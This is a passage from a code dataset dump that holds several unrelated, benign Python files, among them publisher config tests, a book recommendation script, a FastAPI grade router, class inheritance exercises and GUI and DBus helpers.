\"async_publishing_mode\": \"enabled\",\n \"generations_prefix\": \"api_generations\",\n \"min_alive\": {\n \"sas\": 2,\n \"iva\": 0\n },\n \"hosts\": {\n \"host5\": {\n \"key\": \"key:host5.net\",\n \"name\": \"host5.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-5\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"sas\"\n },\n \"host6\": {\n \"key\": \"key:host6.net\",\n \"name\": \"host6.net\",\n \"cluster\": 1,\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"sas\"\n }\n }\n },\n \"market_report_meta@atlantis\": {\n \"async_publishing_mode\": \"enabled\",\n \"min_alive\": {\n \"man\": 2,\n \"sas\": 2,\n \"vla\": 2\n },\n \"hosts\": {}\n },\n \"market_report_exp1@atlantis\": {\n \"async_publishing_mode\": \"enabled\",\n \"min_alive\": {\n \"man\": 2,\n \"sas\": 2,\n \"vla\": 2\n },\n \"hosts\": {}\n }\n }\n}''')\n\n\n@pytest.yield_fixture()\ndef miconfig_mock(tmpdir):\n icpath = source_path('market/idx/miconfigs/etc/feature/common.ini')\n dspath = source_path('market/idx/marketindexer/tests/datasources.conf')\n full_config = miconfig.MiConfig(icpath, dspath, prefix_dir=str(tmpdir))\n py.path.local(full_config.log_dir).ensure(dir=True)\n py.path.local(full_config.reductor_config_path).write('{\"dcgroups\": {}}', ensure=True)\n with mock.patch('market.idx.marketindexer.miconfig.force_full_mode', lambda: full_config),\\\n mock.patch('market.idx.pylibrary.mindexer_core.publishers.publisher.miconfig.force_full_mode', lambda: full_config):\n yield full_config\n\n\ndef test_reconfigure_zk(miconfig_mock):\n reconfigure_zk(miconfig_mock, zk_master_cls=mock.MagicMock)\n\n\n@pytest.yield_fixture(scope='module')\ndef read_state_file_fixture():\n HostState = collections.namedtuple('HostState', ['dc', 'is_meta', 'is_alive', 'report_status'])\n states = {\n 'host1': HostState('iva', True, True, ''),\n 'host2': HostState('sas', True, True, ''),\n 'host3': HostState('sas', False, True, ''),\n 'host4': HostState('vla', True, False, ''),\n }\n with mock.patch('market.idx.pylibrary.mindexer_core.publishers.async_publisher.read_state_file') as m:\n m.return_value = states\n yield\n\n\n@pytest.yield_fixture(scope='module')\ndef write_publisher_config_to_zk_fixture(read_state_file_fixture):\n with mock.patch('time.time', mock.MagicMock(return_value=1514757600.0)):\n two_phase_reload_meta = {\n 'market_report_meta@atlantis': TwoPhaseReloadMetaSection(\n 'market_report_meta@atlantis',\n enabled=True,\n base_group='market_report_exp1@atlantis',\n dc_allowed_for_reload=['man', 'sas', 'vla'],\n first_phase_cluster_num=2,\n ),\n }\n\n class two_phase_miconfig():\n def __init__(self):\n self.async_copybases = True\n self.search_state_path = ''\n self.two_phase_reload_group = ['prod_report_main_sas@sas']\n self.first_phase_cluster_num = 1\n self.first_phase_num_candidates = 0\n self.two_phase_reload_meta = two_phase_reload_meta\n\n zk = mock.Mock()\n zk.get.return_value = None, None\n write_publisher_config_to_zk(\n zk,\n REDUCTOR_CONFIG,\n root_prefix='/publisher',\n config=two_phase_miconfig(),\n two_phase_reload_meta_groups=two_phase_reload_meta,\n client='test',\n )\n yield zk\n\n\nclass Json(object):\n def __init__(self, json_dict):\n self._dict = json_dict\n\n def __eq__(self, other):\n return json.loads(other) == self._dict\n\n def __repr__(self):\n return json.dumps(self._dict)\n\n\ndef _meta_and_base_config():\n return Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {},\n 'min_alive': {\n 'sas': 2,\n 'man': 2,\n 'vla': 2,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': TwoPhaseReloadMetaConfig(\n enabled=True,\n first_phase_dc='sas',\n first_phase_cluster_num=2,\n ).as_dict(),\n 'timestamp': 1514757600,\n 'client': 'test',\n })\n\n\n@pytest.mark.parametrize('path,data', [\n # hosts\n ('/publisher/hosts/key:host1.net', Json({\n 'group': 'prod_report_int_vla@vla',\n 'cluster': 0,\n 'fqdn': 'host1.net',\n 'dists': {\n 'marketsearch3': ['search-part-1', 'search-stats'],\n },\n 'generations_prefix': '/publisher/generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host2.net', Json({\n 'group': 'prod_report_int_vla@vla',\n 'cluster': 0,\n 'fqdn': 'host2.net',\n 'dists': {\n 'marketsearch3': ['search-part-2', 'search-stats'],\n },\n 'generations_prefix': '/publisher/generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host3.net', Json({\n 'group': 'prod_report_api_iva@iva',\n 'cluster': 0,\n 'fqdn': 'host3.net',\n 'dists': {\n 'marketsearch3': ['search-part-3', 'search-stats'],\n 'marketsearchsnippet': ['search-snippet-part-3']\n },\n 'generations_prefix': '/publisher/api_generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host4.net', Json({\n 'group': 'prod_report_api_iva@iva',\n 'cluster': 1,\n 'fqdn': 'host4.net',\n 'dists': {},\n 'generations_prefix': '/publisher/api_generations',\n 'timestamp': 1514757600,\n })),\n # group configs\n ('/publisher/prod_report_int_vla@vla/config', Json({\n 'simultaneous_restart': 3,\n 'failures_threshold': 4,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host1.net',\n 'fqdn': 'host1.net',\n 'port': 9002,\n 'datacenter': None\n }, {\n 'key': 'key:host2.net',\n 'fqdn': 'host2.net',\n 'port': 17051,\n 'datacenter': None\n }\n ]\n },\n 'min_alive': {},\n 'reload_timeout': 600,\n 'async_publishing': 'disabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/prod_report_api_iva@iva/config', Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host3.net',\n 'fqdn': 'host3.net',\n 'port': 17052,\n 'datacenter': 'iva',\n }\n ],\n '1': [\n {\n 'key': 'key:host4.net',\n 'fqdn': 'host4.net',\n 'port': 9002,\n 'datacenter': 'sas'\n }\n ]\n },\n 'min_alive': {\n 'sas': 0,\n 'iva': 1,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/prod_report_main_sas@sas/config', Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host5.net',\n 'fqdn': 'host5.net',\n 'port': 17052,\n 'datacenter': 'sas',\n }\n ],\n '1': [\n {\n 'key': 'key:host6.net',\n 'fqdn': 'host6.net',\n 'port': 17052,\n 'datacenter': 'sas'\n }\n ]\n },\n 'min_alive': {\n 'sas': 2,\n 'iva': 0,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'enabled',\n 'first_phase_nclusters': 1,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/market_report_meta@atlantis/config', _meta_and_base_config()),\n ('/publisher/market_report_exp1@atlantis/config', _meta_and_base_config()),\n])\ndef test_write_publisher_config_to_zk_set_calls(write_publisher_config_to_zk_fixture, path, data):\n write_publisher_config_to_zk_fixture.set.assert_any_call(path, data)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_reconfigure.py","file_name":"test_reconfigure.py","file_ext":"py","file_size_in_byte":13146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23464269441","text":"from models.models_zoo import unet_resnext_50, unet_resnext_50_lovasz\nfrom segmentation_models.backbones.preprocessing import get_preprocessing\n\n\ndef get_model(network, input_shape, freeze_encoder):\n if network == 'unet_resnext_50':\n model = unet_resnext_50(input_shape, freeze_encoder)\n return model, get_preprocessing('resnext50')\n elif network == 'unet_resnext_50_lovasz':\n model = unet_resnext_50_lovasz(input_shape, freeze_encoder)\n return model, get_preprocessing('resnext50')\n else:\n raise ValueError('Unknown network ' + network)\n\n return model, preprocess\n","repo_name":"ybabakhin/kaggle_salt_bes_phalanx","sub_path":"bes/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"72"} +{"seq_id":"5070845677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Aakriti Gupta\r\n\"\"\"\r\nprint ()\r\n\r\nimport networkx\r\nfrom operator import itemgetter\r\nimport matplotlib.pyplot\r\n\r\n# Read the data from the amazon-books.txt;\r\n# populate amazonProducts nested dicitonary;\r\n# key = ASIN; value = MetaData associated with ASIN\r\nfhr = open('/Users/aaku/Desktop/CIS509/HwAssignment5/amazon-books.txt', 'r', encoding='utf-8', errors='ignore')\r\namazonBooks = {}\r\nfhr.readline()\r\nfor line in fhr:\r\n cell = line.split('\\t')\r\n MetaData = {}\r\n MetaData['Id'] = cell[0].strip() \r\n ASIN = cell[1].strip()\r\n MetaData['Title'] = cell[2].strip()\r\n MetaData['Categories'] = cell[3].strip()\r\n MetaData['Group'] = cell[4].strip()\r\n MetaData['SalesRank'] = int(cell[5].strip())\r\n MetaData['TotalReviews'] = int(cell[6].strip())\r\n MetaData['AvgRating'] = float(cell[7].strip())\r\n MetaData['DegreeCentrality'] = int(cell[8].strip())\r\n MetaData['ClusteringCoeff'] = float(cell[9].strip())\r\n amazonBooks[ASIN] = MetaData\r\nfhr.close()\r\n\r\n# Read the data from amazon-books-copurchase.adjlist;\r\n# assign it to copurchaseGraph weighted Graph;\r\n# node = ASIN, edge= copurchase, edge weight = category similarity\r\nfhr=open(\"amazon-books-copurchase.edgelist\", 'rb')\r\ncopurchaseGraph=networkx.read_weighted_edgelist(fhr)\r\nfhr.close()\r\n\r\n# Now let's assume a person is considering buying the following book;\r\n# what else can we recommend to them based on copurchase behavior \r\n# we've seen from other users?\r\nprint (\"Looking for Recommendations for Customer Purchasing this Book:\")\r\nprint (\"--------------------------------------------------------------\")\r\npurchasedAsin = '0805047905'\r\n\r\n# Let's first get some metadata associated with this book\r\nprint (\"ASIN = \", purchasedAsin) \r\nprint (\"Title = \", amazonBooks[purchasedAsin]['Title'])\r\nprint (\"SalesRank = \", amazonBooks[purchasedAsin]['SalesRank'])\r\nprint (\"TotalReviews = \", amazonBooks[purchasedAsin]['TotalReviews'])\r\nprint (\"AvgRating = \", amazonBooks[purchasedAsin]['AvgRating'])\r\nprint (\"DegreeCentrality = \", amazonBooks[purchasedAsin]['DegreeCentrality'])\r\nprint (\"ClusteringCoeff = \", amazonBooks[purchasedAsin]['ClusteringCoeff'])\r\n \r\n# Now let's look at the ego network associated with purchasedAsin in the\r\n# copurchaseGraph - which is esentially comprised of all the books \r\n# that have been copurchased with this book in the past\r\npurchasedAsinEgoGraph = networkx.ego_graph(copurchaseGraph, purchasedAsin, radius=1)\r\n\r\n# -------------------------------------------------------------------------------\r\n# Print the Ego Network \r\n#pos=networkx.spring_layout(purchasedAsinEgoGraph)\r\n#matplotlib.pyplot.figure(figsize=(15,15))\r\n#networkx.draw_networkx_nodes(purchasedAsinEgoGraph,pos,node_size=1500)\r\n#networkx.draw_networkx_labels(purchasedAsinEgoGraph,pos,font_size=10)\r\n#edgewidth = [ d['weight'] for (u,v,d) in G.edges(data=True)]\r\n#networkx.draw_networkx_edges(purchasedAsinEgoGraph,pos,width=edgewidth)\r\n#edgelabel = networkx.get_edge_attributes(purchasedAsinEgoGraph,'weight')\r\n#networkx.draw_networkx_edge_labels(purchasedAsinEgoGraph,pos,edge_labels=edgelabel,font_size=10)\r\n#matplotlib.pyplot.axis('off')\r\n#matplotlib.pyplot.show()\r\n# -------------------------------------------------------------------------------\r\n\r\n# Next, recall that the edge weights in the copurchaseGraph is a measure of\r\n# the similarity between the books connected by the edge. So we can use the \r\n# island method to only retain those books that are highly simialr to the \r\n# purchasedAsin\r\nthreshold = 0.5\r\npurchasedAsinEgoTrimGraph = networkx.Graph()\r\nfor f, t, e in purchasedAsinEgoGraph.edges(data=True):\r\n if e['weight'] >= threshold:\r\n purchasedAsinEgoTrimGraph.add_edge(f,t,e)\r\n \r\n# -------------------------------------------------------------------------------\r\n# PRINT THE ISLAND GRAPH \r\n\r\n#pos=networkx.spring_layout(purchasedAsinEgoTrimGraph)\r\n#matplotlib.pyplot.figure(figsize=(15,15))\r\n#networkx.draw_networkx_nodes(purchasedAsinEgoTrimGraph,pos,node_size=1500)\r\n#networkx.draw_networkx_labels(purchasedAsinEgoTrimGraph,pos,font_size=10)\r\n#edgewidth = [ d['weight'] for (u,v,d) in purchasedAsinEgoTrimGraph.edges(data=True)]\r\n#networkx.draw_networkx_edges(purchasedAsinEgoTrimGraph,pos,width=edgewidth)\r\n#edgelabel = networkx.get_edge_attributes(purchasedAsinEgoTrimGraph,'weight')\r\n#networkx.draw_networkx_edge_labels(purchasedAsinEgoTrimGraph,pos,edge_labels=edgelabel,font_size=10)\r\n#matplotlib.pyplot.axis('off') \r\n#matplotlib.pyplot.show() \r\n # -------------------------------------------------------------------------------\r\n\r\n# Next, recall that given the purchasedAsinEgoTrimGraph you constructed above, \r\n# you can get at the list of nodes connected to the purchasedAsin by a single \r\n# hop (called the neighbors of the purchasedAsin) \r\npurchasedAsinNeighbors = []\r\npurchasedAsinNeighbors = purchasedAsinEgoTrimGraph.neighbors(purchasedAsin)\r\n# print(len(purchasedAsinNeighbors))\r\n# print(purchasedAsinNeighbors)\r\n\r\n# Next, let's pick the Top Five book recommendations from among the \r\n# purchasedAsinNeighbors based on one or more of the following data of the \r\n# neighboring nodes: SalesRank, AvgRating, TotalReviews, DegreeCentrality, \r\n# and ClusteringCoeff\r\nprint()\r\nweights = {}\r\nfor a in purchasedAsinNeighbors:\r\n # print('ASIN:',a)\r\n # print('Clustering Coefficient:', amazonBooks[a]['ClusteringCoeff'])\r\n # print('Degree Centrality:', amazonBooks[a]['DegreeCentrality'])\r\n # print('Average Rating:', amazonBooks[a]['AvgRating'])\r\n dc = amazonBooks[a]['DegreeCentrality']\r\n cc = amazonBooks[a]['ClusteringCoeff']\r\n sales = amazonBooks[a]['SalesRank']\r\n val = (cc*dc)/sales\r\n val = round(val, 5)\r\n # print('Value:', val)\r\n weights[a] = val\r\n # print()\r\n# print(weights)\r\nprint()\r\nsorted_weights = sorted(weights.items(), key=itemgetter(1), reverse=True)\r\n# print(sorted_weights)\r\ntop5 = {}\r\ni = 0\r\nwhile i < 5:\r\n top5[sorted_weights[i][0]] = sorted_weights[i][1]\r\n i = i + 1\r\nprint()\r\n# print(top5)\r\n# print()\r\n \r\n# Print Top 5 recommendations (ASIN, and associated Title, Sales Rank, \r\n# TotalReviews, AvgRating, DegreeCentrality, ClusteringCoeff)\r\nj = 1\r\nprint (\"Top 5 Recommendations for Customer\")\r\nprint (\"-------------------------------------\")\r\nfor rec in top5.keys():\r\n # print(rec)\r\n print(\"Recommendation #\", j)\r\n print (\"ASIN = \", rec) \r\n print (\"Title = \", amazonBooks[rec]['Title'])\r\n print (\"SalesRank = \", amazonBooks[rec]['SalesRank'])\r\n print (\"TotalReviews = \", amazonBooks[rec]['TotalReviews'])\r\n print (\"AvgRating = \", amazonBooks[rec]['AvgRating'])\r\n print (\"DegreeCentrality = \", amazonBooks[rec]['DegreeCentrality'])\r\n print (\"ClusteringCoeff = \", amazonBooks[rec]['ClusteringCoeff'])\r\n j = j + 1\r\n print()\r\n","repo_name":"aagupta/SocialNetworkAnalysis","sub_path":"A71Assignment5.py","file_name":"A71Assignment5.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"830144068","text":"# colors to prettify output, don't edit\nclr = ['\\033[38;5;208m', # Phone\n '\\033[38;5;112m', # Computer\n '\\033[38;5;87m', # Smartphone\n '\\033[38;5;160m', # IPhone\n '\\033[0m']\n\nclass Phone(object): # you may edit within the parentheses\n def __init__(self, number):\n print(f'{clr[0]}[Phone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n # super(Phone, self).__init__()\n self.number = number\n\n def make_call(self, number):\n print(f'{clr[0]}[Phone make call ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `make_call` method)\n print(f'Call from {self.number} to {number}.')\n\nclass Computer(object): # you may edit within the parentheses\n def __init__(self, operating_system, cpu, ram_size, input_devices):\n print(f'{clr[1]}[Computer init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n # super(Computer, self).__init__()\n self.operating_system = operating_system\n self.cpu = cpu\n self.ram_size = ram_size\n self.input_devices = input_devices\n\nclass Smartphone(Computer, Phone): # you may edit within the parentheses\n def __init__(self, operating_system, cpu, ram_size, number, battery):\n print(f'{clr[2]}[Smartphone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n Computer.__init__(self, operating_system, cpu, ram_size, ['touch screen'])\n Phone.__init__(self, number)\n self.battery = battery\n\nclass IPhone(Smartphone): # you may edit within the parentheses\n def __init__(self, cpu, ram_size, number, battery):\n print(f'{clr[3]}[IPhone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n super(IPhone, self).__init__(\"iOS\", cpu, ram_size, number, battery)\n","repo_name":"obuhaiov-ucode/Python_sprints","sub_path":"sprint5/t04_inheritance/gadgets.py","file_name":"gadgets.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23628894564","text":"import pygame\nfrom .gui_abstract_object import GuiAbstractObject\n\n\nclass Location(GuiAbstractObject):\n\n def __init__(self, x, y, player, screen):\n self.player = player\n self.position = (x, y, 400, 30)\n self.screen = screen\n self.rects_pos = {\n 'main': None,\n }\n self.strings = {\n 'location': (),\n }\n self.buttons = []\n\n def create(self):\n position = (self.position[0] * self.screen.engine.settings.graphic['screen']['resolution_scale'][0],\n self.position[1] - 100 * self.screen.engine.settings.graphic['screen']['resolution_scale'][1],\n self.position[2] * self.screen.engine.settings.graphic['screen']['resolution_scale'][0],\n self.position[3] * self.screen.engine.settings.graphic['screen']['resolution_scale'][1])\n self.rects_pos['main'] = (position, (255, 255, 255))\n\n text = self.screen.engine.map.name + ' | x: ' + str(self.player.coordinate[0]) + ' | y: '\\\n + str(self.player.coordinate[1])\n self.strings['location'] = (text, position)\n\n\n def render(self):\n pygame.draw.rect(self.screen.screen, self.rects_pos['main'][1], self.rects_pos['main'][0])\n text = self.screen.engine.map.name + ' | x: ' + str(self.player.coordinate[0]) + ' | y: '\\\n + str(self.player.coordinate[1])\n self.strings['location'] = (text, self.strings['location'][1])\n self.render_text(self.strings['location'][1][0], self.strings['location'][1][2], self.strings['location'][1][1],\n self.strings['location'][1][3], self.strings['location'][0])\n\n def render_text(self, x1, x2, y1, y2, string):\n text_size = self.screen.font.size(string)\n\n x = x2 - text_size[0]\n y = y2 - text_size[1]\n\n x /= 2\n y /= 2\n\n x += x1\n y += y1\n\n string = self.screen.font.render(string, self.screen.engine.settings.graphic['screen']['antialias'], (0, 0, 0))\n self.screen.screen.blit(string, (x, y))\n","repo_name":"Sheidaas/gamee","sub_path":"data/modules/graphic/two_D/player_gui/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18075074932","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy import select\n\nfrom app.models.models import Grade as GradeModel\nfrom app.schemas.schemas import GradeCreate, GradeUpdate, Grade\n\nfrom app.database.database import get_async_db\n\nrouter = APIRouter()\n\n\n@router.post(\"/grades\", response_model=Grade)\nasync def create_grade(grade: GradeCreate, db: AsyncSession = Depends(get_async_db)):\n \"\"\"Create a new grade.\"\"\"\n\n db_grade = GradeModel(**grade.dict())\n db.add(db_grade)\n await db.commit()\n await db.refresh(db_grade)\n\n return Grade.from_orm(db_grade)\n\n\n@router.put(\"/grades/{grade_id}\", response_model=Grade)\nasync def update_grade(grade_id: int, grade_update: GradeUpdate, db: AsyncSession = Depends(get_async_db)):\n \"\"\"Update existing grade by ID\"\"\"\n\n # get the grade\n grade = await db.execute(select(GradeModel).where(GradeModel.grade_id == grade_id))\n db_grade = grade.scalar()\n if db_grade is None:\n raise HTTPException(status_code=404, detail=\"Grade not found\")\n\n if grade_update.grade is not None:\n db_grade.grade = grade_update.grade\n\n await db.commit()\n await db.refresh(db_grade)\n\n return Grade.from_orm(db_grade)\n","repo_name":"Shved15/Polymedic-test-task","sub_path":"app/routes/grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29673706545","text":"import sys\r\nclass DNode: #이중연결리스트로 구현 그냥 연결리스트와는 달리 이전노드로 갈 수 있어서 접근하기 쉬우나 메모리는 더 많이 \r\n def __init__(self,e):\r\n self.data=e\r\n self.back=None\r\n self.next=None\r\n\r\nclass web: \r\n def __init__(self):\r\n first=DNode('www.hufs.ac.kr') #초기 사이트 설정\r\n self.historylist=['www.hufs.ac.kr'] #go한 사이트 기록\r\n self.historyout=[] #사이트 기록 출력위한 리스트\r\n self.head=first\r\n self.tail=first\r\n self.now=first\r\n print(first.data) #초기사이트 출력\r\n \r\n \r\n \r\n def go(self,addr):\r\n new=DNode(addr)\r\n if self.now== self.tail: #마지막 방문상태에서 새로 이동 \r\n self.tail.next=new\r\n new.back=self.tail\r\n self.tail=new #마지막 값 tail을 새로 방문한 주소로 설정\r\n self.now=new #현재 사이트를 새로 방문한 주소로 설정\r\n self.historylist.append(self.now.data)\r\n print(self.now.data)\r\n else: #뒤로가기 한 상태에서 새로 이동\r\n new.back=self.now\r\n self.now.next=new\r\n self.now=new #현재 사이트를 새로 방문한 주소로 설정\r\n self.tail=new #마지막 값 tail을 새로 방문한 주소로 설정\r\n self.historylist.append(self.now.data)\r\n print(self.now.data)\r\n \r\n \r\n def forward(self): #앞으로 가기\r\n if self.now==self.tail: #더이상 앞으로 갈 수 없음\r\n return\r\n else:\r\n self.now=self.now.next\r\n print(self.now.data)\r\n \r\n def backward(self): #뒤로 가기\r\n if self.now==self.head: #더이상 뒤로 갈 수 없음\r\n return\r\n else:\r\n self.now=self.now.back\r\n print(self.now.data)\r\n \r\n def history(self): #go한 사이트 기록 역순으로 출력\r\n self.historyout=[] #history 여러번 구현을 위한 출력리스트 비우기\r\n index=len(self.historylist)-1 #역순이므로 반대로 중복검사\r\n while index >= 0:\r\n if self.historylist[index] not in self.historyout:\r\n self.historyout.append(self.historylist[index])\r\n index-=1\r\n \r\n for i in range(len(self.historyout)): #history출력\r\n print(self.historyout[i])\r\n \r\n def quit(self):\r\n exit() \r\n\r\nexplore=web() \r\nwhile True:\r\n come=sys.stdin.readline().strip()\r\n if come[0:2]=='go':\r\n fun,address=come.split()\r\n else:\r\n fun=come\r\n \r\n if fun=='go':\r\n explore.go(address)\r\n elif fun=='forward':\r\n explore.forward()\r\n elif fun=='backward':\r\n explore.backward()\r\n elif fun=='history':\r\n explore.history()\r\n elif fun=='quit':\r\n explore.quit()\r\n \r\n","repo_name":"yeolgong/pystudy","sub_path":"5회차/201902520 5.2.py","file_name":"201902520 5.2.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23455642431","text":"import dbus\n\nfrom PyQt4 import QtCore\n\n\nbus = dbus.SystemBus()\nproxy = bus.get_object('org.freedesktop.UDisks', '/org/freedesktop/UDisks')\ninterface = dbus.Interface(proxy, 'org.freedesktop.UDisks')\n\n\nclass Partition(QtCore.QObject):\n\n def __init__(self, properties, parent=None):\n QtCore.QObject.__init__(self, parent)\n self._properties = properties\n\n def __str__(self):\n return str(self._properties['DeviceFile'])\n\n def _getName(self):\n return str(self._properties['DeviceFile'])\n\n changed = QtCore.pyqtSignal()\n\n name = QtCore.pyqtProperty(unicode, _getName, notify=changed)\n\n\nclass Drive(QtCore.QObject):\n\n def __init__(self, properties, parent=None):\n QtCore.QObject.__init__(self, parent)\n self._properties = properties\n self._partition = []\n\n def __str__(self):\n return str(self._properties['DeviceFile'])\n\n def addPartition(self, partition):\n self._partition.append(partition)\n\n def _getName(self):\n return str(self._properties['DeviceFile'])\n\n changed = QtCore.pyqtSignal()\n\n name = QtCore.pyqtProperty(unicode, _getName, notify=changed)\n\n\nclass DriveModel(QtCore.QAbstractListModel):\n\n COLUMNS = ('drive',)\n\n def __init__(self, parent=None):\n QtCore.QAbstractListModel.__init__(self, parent)\n self._drivers = []\n self.setRoleNames(dict(enumerate(DriveModel.COLUMNS)))\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self._drivers)\n\n def data(self, index, role):\n if index.isValid() and role == DriveModel.COLUMNS.index('drive'):\n return self._drivers[index.row()]\n return None\n\n def populate(self):\n drivers = {}\n partitions = {}\n\n for device in interface.EnumerateDevices():\n deviceProxy = bus.get_object('org.freedesktop.UDisks', device)\n deviceInterface = dbus.Interface(deviceProxy, 'org.freedesktop.DBus.Properties')\n deviceProperties = deviceInterface.GetAll('org.freedesktop.UDisks.Device')\n\n if deviceProperties['DeviceIsDrive'] == 1:\n drivers[str(device)] = Drive(deviceProperties)\n continue\n\n if deviceProperties['DeviceIsPartition'] == 1:\n try:\n # Check if partition key alrealy exist\n partitions[str(deviceProperties['PartitionSlave'])]\n except KeyError:\n # if not create a empty list to the given key partition\n partitions[str(deviceProperties['PartitionSlave'])] = []\n partitions[str(deviceProperties['PartitionSlave'])].append(Partition(deviceProperties))\n continue\n\n for (driver_name, driver_klass) in drivers.items():\n try:\n for partition in partitions[driver_name]:\n driver_klass.addPartition(partition)\n except KeyError:\n # A keyError is raised if the given drive don't have partitions\n pass\n self._drivers.append(driver_klass)\n","repo_name":"wiliamsouza/Disks","sub_path":"disks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26815065160","text":"from django.conf.urls import url\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'polls'\n\ntry:\n urlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n path('moods', views.MoodsView.as_view(), name='moods'),\n url(r'^(?P[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n ]\n # MoodView\nexcept:\n print(\"ERROR\")","repo_name":"apiispanen/biohacker","sub_path":"mysite/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21097938311","text":"# Randomly selects ~500 queries to test from the 1.4mil query set\n\nimport random\n\ndef main():\n\toutfile = open(\"queries/test-queries.txt\", \"w\")\n\t#h = 100 / 23000\n\t#h = 0\n\th = 1.0\n\toutfile.write(\"JOINLESS\\n\")\n\twith open(\"queries/joinless-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\t#h = 500 / 700000\n\toutfile.write(\"NATURAL\\n\")\n\twith open(\"queries/natural-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\toutfile.write(\"CROSS\\n\")\n\twith open(\"queries/cross-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\toutfile.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"mkitzan/constexpr-sql","sub_path":"tests/scripts/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"72"} +{"seq_id":"4279990969","text":"import datetime\nfrom sklearn.datasets import load_digits\nimport numpy as np\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\n\nbatch_size = 200\nraw_data_path = \"data/raw/{}/data.csv\"\nraw_target_path = \"data/raw/{}/target.csv\"\n\ndef _generate_data(k: int = 200,\n save_data_path: str = None,\n save_target_path: str = None,\n date: str = datetime.today().strftime('%Y-%m-%d')) -> None:\n \n X, y = load_digits(return_X_y=True)\n idx = np.random.randint(X.shape[0], size=k)\n\n if save_data_path is not None:\n save_data_path = save_data_path.format(date)\n 